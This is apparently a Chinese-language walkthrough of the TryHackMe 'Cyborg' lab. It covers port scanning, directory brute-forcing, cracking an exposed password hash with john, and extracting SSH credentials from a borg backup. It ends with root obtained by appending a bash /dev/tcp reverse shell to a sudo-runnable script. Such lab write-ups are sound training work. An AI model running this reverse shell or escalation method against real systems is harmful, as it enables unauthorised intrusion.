[Day12] THM Cyborg

• 网址：https://tryhackme.com/room/cyborgt8
• IP : 10.10.210.57

资料蒐集

• 老梗 nmap -A 10.10.210.5
  • 
• 回答问题
  • Scan the machine, how many ports are open
    • 2
  • What service is running on port 22?
    • SSH
  • What service is running on port 80?
    • HTTP
• 扫路径
  • python3 dirsearch.py -u http://10.10.210.57/ -e all
    • /admin/
    • /etc/

Web

• 先从 /etc/ 路径开始看里面有啥
  • http://10.10.210.57/etc
  • 
• 找到路径底下有一个 passwd 档案
  • http://10.10.210.57/etc/squid/passwd
    • music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
    • 看起来是密码 hash
• 透过 john 进行爆破
  • john a.txt --wordlist=/opt/rockyou
  • 
  • 取得帐密
    • 帐号 : music_archive
    • 密码 : squidward
• 继续逛 /admin/
  • 发现有 Archive 可以下载
  • 
• 解开之後发现是一种奇怪格式
  • 
  • 档案都是 binary 无法 print
  • Readme 提醒我们可以去看这个网址
    • https://borgbackup.readthedocs.io/
  • borg 是一种备份程序

Brog

• 尝试简单的看完说明後
  • borg list .
    • 输入密码，刚刚约翰破出来的 squidward
    • 可以看到一些资讯
  • borg mount . ../a
    • 把档案挂载起来
    • 
• 发现挂载的档案里面有 note
  • 
  • alex:S3cretP@s3
  • 看起来就很像帐密

SSH

• 用 ssh 搭配帐密登入
  • 
  • 取得 user flag
  • 

提权

• 先用 sudo -l 看我们有什麽权限
  • 
  • 发现我们可以用 sudo 执行 /etc/mp3backups/backup.sh
• 观察权限
  • 
  • 发现我们是这个档案的拥有者，但我们不能修改他
  • 不过可以透过 chmod +w 新增 Write 权限
• 插入 Reverse shell
  • echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'" >> /etc/mp3backups/backup.sh
  • 直接用 reverse shell 插入档案最下方
• 执行 shell
  • 攻击机开启监听
    • nc -vlk 7877
  • 被骇机用 sudo 执行该档案
    • sudo /etc/mp3backups/backup.sh
• 拿到 root shell!
  •